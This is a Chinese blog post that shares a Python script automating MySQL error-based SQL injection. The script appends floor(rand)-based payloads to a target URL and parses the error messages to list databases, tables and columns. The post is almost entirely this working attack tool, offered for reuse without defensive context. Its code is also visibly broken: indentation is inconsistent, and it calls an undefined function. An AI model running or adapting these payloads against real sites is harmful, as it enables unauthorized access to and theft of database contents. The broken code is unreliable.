首页 > itarticle > python脚本实现半自动化报错注入

python脚本实现半自动化报错注入

admin 1月 23, 2021 0

贴一个python写的报错注入脚本,就当保存一下代码,以后可以回头参考参考。

运行环境:python3

代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
 
#!/usr/bin/env python3
# -*- coding: utf-8 -*-

from optparse import OptionParser
import sys
import requests
import re

parser=OptionParser()

parser.add_option("-D", "--database", action="store",type="string",dest="database",help="Please input test databases")
parser.add_option("-T", "--table",action="store",type="string",dest="table",help="Please input test table")
parser.add_option("-C", "--column",action="store",type="string",dest="column",help="Please input test column")
parser.add_option("-U","--url", action="store",type="string",dest="url",help="Please input test url")

(options,args) = parser.parse_args()

def main():
    if options.url == None and options.database == None and options.table == None and options.column == None:
        print("Please read the help")
        parser.print_help()
        sys.exit()
    elif options.url != None and options.database ==None and options.table == None and options.column == None:
        get_all_databases(options.url)
    elif  options.url != None and options.database !=None and options.table == None and options.column == None:
        get_db_all_tables(options.url,options.database)
    elif  options.url != None and options.database !=None and options.table != None and options.column == None:
        get_db_tb_all_columns(options.url,options.database,options.table)
    elif  options.url != None and options.database !=None and options.table != None and options.column != None:
        getAllContent(options.url,options.database,options.table,options.column)

def http_get(url):
    result = requests.get(url)
    return result.text


def get_all_databases(url):
    db_nums_payload = url + " and (select 1 from (select count(*),concat(0x7e,(select count(schema_name) from information_schema.schemata),0x7e,floor(rand(0)*2))x from information_schema.tables group by x)a)"
    # print(db_nums_payload)
    html = http_get(db_nums_payload)
    # print(html)
    result = re.search(r'~(.*?)~',html,re.S|re.I)
    # print(result)
    db_nums = int(result.group(1))
    print("数据库的个数为:%d" % db_nums)

    for x in range(db_nums):
        db_name_payload = url + " and (select 1 from (select count(*),concat(0x7e,(select schema_name from information_schema.schemata limit %d,1),0x7e,floor(rand(0)*2))x from information_schema.tables group by x)a)" % x
        html = http_get(db_name_payload)
        # print(html)
        result = re.search(r'~(.*?)~',html,re.S|re.I)
        db_name = result.group(1)
        print("第%d个数据库为:%s" % (x+1,db_name))



def get_db_all_tables(url,database):
 tb_nums_payload = url + " and (select 1 from (select count(*),concat(0x7e,(select count(table_name) from information_schema.tables where table_schema = '%s'),0x7e,floor(rand(0)*2))x from information_schema.tables group by x)a)" % database
   # print(tb_nums_payload)

    html = http_get(tb_nums_payload)
 # print(html)

   result = re.search(r'~(.*?)~',html,re.S|re.I)

   tb_nums = int(result.group(1))
   print(database,"数据库中表的个数为:%d" % tb_nums)

    for x in range(tb_nums):
     tb_name_payload = url + " and (select 1 from (select count(*),concat(0x7e,(select table_name from information_schema.tables where table_schema = '%s' limit %d,1),0x7e,floor(rand(0)*2))x from information_schema.tables group by x)a)" % (database,x) 
      # print(tb_name_payload)
     html = http_get(tb_name_payload)
     # print(html)
        result = re.search(r'~(.*?)~',html,re.S|re.I)
        tb_name = result.group(1)
        print(database,"数据库第%d个数据库为:%s" % (x+1,tb_name))



def get_db_tb_all_columns(url,database,table):
 co_nums_payload = url + " and (select 1 from (select count(*),concat(0x7e,(select count(column_name) from information_schema.columns where table_schema = '%s' and table_name = '%s'),0x7e,floor(rand(0)*2))x from information_schema.tables group by x)a)" % (database,table)
   html = http_get(co_nums_payload)
 #print(html)

    result = re.search(r'~(.*?)~',html,re.S|re.I)
    co_nums = int(result.group(1))
   # print(co_nums)
 print("%s数据库中的%s表里面的字段个数为:%d" % (database,table,co_nums))

   for x in range(co_nums):
     co_name_payload = url + " and (select 1 from (select count(*),concat(0x7e,(select column_name from information_schema.columns where table_schema = '%s' and table_name = '%s' limit %d,1),0x7e,floor(rand(0)*2))x from information_schema.tables group by x)a)" % (database,table,x)
     html = http_get(co_name_payload)
     result = re.search(r'~(.*?)~',html,re.S|re.I)
        co_name = result.group(1)
        print("%s数据库中%s表中的第%d个字段为:%s" % (database,table,x+1,co_name))


if __name__ == '__main__':
    main()

运行结果:

mark

微海报分享

近期文章

近期评论

标签

热门

文章归档

分类目录

功能